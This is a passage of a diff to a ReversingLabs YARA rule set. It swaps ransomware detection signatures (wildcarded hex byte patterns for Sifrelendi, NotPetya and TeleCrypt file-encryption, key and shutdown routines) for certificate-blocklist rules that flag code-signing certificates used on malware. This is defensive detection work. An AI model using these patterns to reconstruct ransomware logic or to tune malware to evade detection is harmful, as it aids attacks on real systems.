-            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 06 1B 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            06 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11
-            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            06 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 2D ?? 00 11
-            ?? 7E ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 72 ??
-            ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F
-            ?? ?? ?? ?? DC DE ?? 26 DE ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ??
-            28 ?? ?? ?? ?? 26 2A
-        }
-		$get_key = {
-            73 ?? ?? ?? ?? 0A 06 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11
-            ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D
-            ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ??
-            ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 07 6F ??
-            ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11
-            ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A
-        }
-		$encrypt_files = {
-            28 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 6F ?? ?? ?? ?? 06 20
-            ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 6F ?? ??
-            ?? ?? 06 19 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 06 06 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 02 03 07 28 ?? ??
-            ?? ?? 0C DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $get_key ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EVANGEL TECHNOLOGY(HK) LIMITED" and pe.signatures [ i ] . serial == "74:db:e8:30:82:e1:b3:df:a2:9f:9c:24" and 1468817578 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sifrelendi : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0A466553A6391Aafd181B400266C7B18 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sifrelendi ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b9083b7c-eb09-52da-a240-39b51df892f9"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "ef8ff250-840f-5b55-b0c7-85ca54aadc59"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Sifrelendi.yara#L1-L67"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "430d3877c10c86fcb19b5624dd8886d61e54ccd0453678329309b49712c6d5c6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13240-L13256"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cb21e5759887904d6a38cd1b363610ebc0bfd9a357050c602210468992815cbe"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sifrelendi"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files = {
-            E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 85 ?? ?? ??
-            ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74
-            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 EB
-            ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D
-            C3
-        }
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
-            FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C9 B2 ?? A1 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B F8 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B C7 E8 ?? ?? ?? ?? 33 C9 B2
-            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ??
-            ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B 45
-            ?? 8B 10 FF 12 50 8B CB 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? 6A ?? 6A
-            ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 8B 10 FF 12 50 8B 4D ?? 8B D3 8B C7 E8 ?? ?? ?? ?? 8B
-            C7 8B 10 FF 52 ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 8D 45
-            ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PhaseQ Limited" and pe.signatures [ i ] . serial == "0a:46:65:53:a6:39:1a:af:d1:81:b4:00:26:6c:7b:18" and 1555545600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Notpetya : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0D3Dec8794Fa7228D1Ee40Eeb8187149 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects NotPetya ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ea655048-4ef7-5dd7-872e-f1c2e38234cf"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "54e9ec00-d054-521b-b60b-81efe3a8ce12"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.NotPetya.yara#L1-L73"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "328f0e527fee2145879ee13c003d375db832f7f3eacf7a1eb303393c1c8b5a36"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13258-L13274"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "20084dc0b069d65755f859f5aef4be5599d1f066ba006199d3ce803b0d8f041e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "NotPetya"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_file = {
-            8B EC 83 EC ?? 53 56 57 33 F6 56 56 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 89
-            75 ?? 39 75 ?? 7C ?? B8 ?? ?? ?? ?? 7F ?? 39 45 ?? 76 ?? 89 45 ?? 8B D8 56 53 56 6A
-            ?? 56 57 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 74 ?? FF 75 ?? 56 56 6A ?? 50 FF 15 ?? ??
-            ?? ?? 8B F8 3B FE 74 ?? 53 8D 45 ?? 50 8B 45 ?? 57 56 FF 75 ?? 56 FF 70 ?? FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B C9 C2 ?? ?? 8B 45 ?? 89 45 ?? C1
-            E8 ?? 8D 58 ?? C7 45 ?? ?? ?? ?? ?? C1 E3 ?? E9
-        }
-		$main = {
-            55 8B EC 8B 45 ?? 53 56 8B 35 ?? ?? ?? ?? 57 BF ?? ?? ?? ?? 57 6A ?? BB ?? ?? ?? ??
-            53 83 C0 ?? 6A ?? 50 FF D6 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 57 6A
-            ?? 6A ?? EB ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? 6A ?? 53 8B 45 ?? 6A ?? 83 C0 ?? 50 FF D6
-            85 C0 74 ?? 8B 75 ?? 8B C6 E8 ?? ?? ?? ?? 85 C0 74 ?? 56 6A ?? 56 E8 ?? ?? ?? ?? 56
-            E8 ?? ?? ?? ?? FF 76 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 76 ?? FF 15 ?? ?? ?? ?? EB ?? 8B
-            75 ?? 56 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 5D C2
-        }
-		$encryption_loop = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 83 7D ?? ?? 53 56 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 75 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44
-            24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ??
-            ?? ?? 8B 1D ?? ?? ?? ?? 8B 75 ?? 8B 46 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 ?? 66 8B 10
-            66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85
-            D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24
-            ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83
-            C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ??
-            50 FF 75 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44
-            24 ?? ?? 74 ?? F7 44 24 ?? ?? ?? ?? ?? 75 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            FF D3 85 C0 75 ?? 8B 45 ?? 56 48 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? 8D
-            44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 66 8B 31 83 C1 ?? 66 85 F6 75 ??
-            2B CA D1 F9 8D 4C 4C ?? 3B C1 74 ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 74 ?? FF 75
-            ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5E 5B 8B E5 5D C2
-        }
-		$shutdown = {
-            68 ?? ?? ?? ?? 8B CA 8B D0 0F B7 45 ?? 03 C2 33 D2 F7 F6 0F B7 75 ?? 8D 85 ?? ?? ??
-            ?? 50 03 F1 8B FA FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? F6 05 ?? ?? ??
-            ?? ?? B8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? 56 57 8D 8D ?? ?? ?? ?? 51 50 8D 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 85 ?? ?? ?? ?? 50 56 57
-            8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 5F 5E 8B C3 5B C9 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_file and $main and $encryption_loop and $shutdown
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Financial Security Institute, Inc." and pe.signatures [ i ] . serial == "0d:3d:ec:87:94:fa:72:28:d1:ee:40:ee:b8:18:71:49" and 1582675200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Telecrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_24Af70B5D17A63Ad053E5821 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TeleCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c4eada2d-72c0-5efe-bf2b-8f053348d89d"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "034228b3-1864-5a76-ad9d-531778be10ec"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.TeleCrypt.yara#L1-L109"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9d856eae4369cd7ba1d88bd6ef37931e069127e2c05a84a44f5274f681e83fc0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13276-L13292"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d78f709067c83169484d9dd6e1dd8a88852362da028551d4e55e5703a22e04a7"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TeleCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_file = {
-            57 E8 ?? ?? ?? ?? 89 03 EB ?? 6A ?? E8 ?? ?? ?? ?? 89 03 66 83 BB ?? ?? ?? ?? ?? 0F
-            85 ?? ?? ?? ?? 8B 03 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 66 81 7B ?? ?? ?? 75 ?? E8 ??
-            ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 0F B7 05 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 43 ?? ?? ??
-            ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 6A ?? 6A ?? 50 8D 43 ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 75
-            ?? 66 C7 43 ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 E9 ?? ?? ?? ?? 89 03 66 81 7B ?? ?? ?? 0F
-            85 ?? ?? ?? ?? 66 C7 43 ?? ?? ?? 6A ?? 8B 03 50 E8 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ??
-            8B C3 E8 ?? ?? ?? ?? 8B F0 E9 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 85 FF 7D ?? 33 FF 6A ??
-            6A ?? 57 8B 03 50 E8 ?? ?? ?? ?? 40 74 ?? 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 83
-            ?? ?? ?? ?? 50 8B 03 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C3 E8 ?? ?? ?? ?? 8B F0 E9 ??
-            ?? ?? ?? F6 43 ?? ?? 74 ?? 83 3C 24 ?? 76 ?? 8B 14 24 4A 85 D2 72 ?? 42 33 FF 8D 83
-            ?? ?? ?? ?? 80 38 ?? 75 ?? 6A ?? 6A ?? 8B C7 2B 44 24 ?? 50 8B 03 50 E8 ?? ?? ?? ??
-            40 74 ?? 8B 03 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C3 E8 ?? ?? ?? ?? 8B F0 EB ?? 47 40
-            4A 75 ?? 66 83 BB ?? ?? ?? ?? ?? 75 ?? 0F B7 05 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? 66
-            81 7B ?? ?? ?? 74 ?? 8B 03 50 E8
-        }
-		$server_communication = {
-            6A ?? 8D 45 ?? 50 8B 45 ?? 8B 80 ?? ?? ?? ?? 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
-            ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ??
-            8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 80 ?? ?? ?? ??
-            33 C9 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? B2 ?? A1 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 33 DB 8B CB B8 ?? ?? ??
-            ?? D3 E0 85 F0 74 ?? 8D 45 ?? 8B D3 66 83 C2 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 43 83 FB ?? 75 ?? A1 ?? ??
-            ?? ?? 8B 10 FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 8D 4D ?? 8B D3 A1 ?? ?? ?? ?? 8B
-            38 FF 57 ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 43 4E 75 ?? A1 ?? ?? ?? ?? 8B 10
-            FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 6A ?? 6A ?? 8D 4D ?? 8B D3 A1 ?? ?? ?? ?? 8B
-            38 FF 57 ?? 8B 45 ?? 8B 0D ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 43 4E 75 ?? 8D 55 ?? B8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ??
-            ?? ?? 8B 08 FF 91 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 8B 80 ?? ?? ?? ?? 33 C9 BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55
-            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8
-        }
-		$server_communication_1 = {
-            55 8B EC 33 C9 51 51 51 51 51 53 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A
-            ?? 8D 45 ?? 50 33 C9 BA ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ??
-            50 8D 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 91 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ??
-            ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 33 C9 8B 83 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 33 D2 8B 83 ?? ?? ?? ?? 8B 08 FF 91 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$exec_payload = {
-            55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
-            E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 55 ?? 33 C0 E8 ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? C3
-        }
-		$copy_payload = {
-            55 8B EC 6A ?? 6A ?? 6A ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? B8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B2 ?? E8 ??
-            ?? ?? ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 6A ?? 8D 55 ?? B8 ?? ?? ??
